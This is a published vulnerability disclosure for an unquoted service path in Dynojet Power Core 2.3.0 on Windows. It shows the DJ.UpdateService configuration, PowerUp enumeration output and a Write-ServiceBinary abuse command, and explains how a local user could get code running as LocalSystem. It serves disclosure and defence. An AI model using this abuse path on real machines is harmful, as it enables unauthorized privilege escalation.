Dynojet Power Core 2.3.0 Unquoted Service Path

`# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path  
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)  
# Version: 2.3.0 (Build 303)  
# Date: 30.10.2021  
# Vendor Homepage: https://www.dynojet.com/  
# Software Link: https://docs.dynojet.com/Document/18762  
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)  
  
SERVICE_NAME: DJ.UpdateService  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 3 DEMAND_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : DJ.UpdateService  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
PS C:\Users\Developer> Get-UnquotedService  
  
  
ServiceName : DJ.UpdateService  
Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe  
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;  
Permissions=AppendData/AddSubdirectory}  
StartName : LocalSystem  
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>  
CanRestart : True  
Name : DJ.UpdateService  
  
ServiceName : DJ.UpdateService  
Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe  
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}  
StartName : LocalSystem  
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>  
CanRestart : True  
Name : DJ.UpdateService  
  
#Exploit:  
  
A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.  
`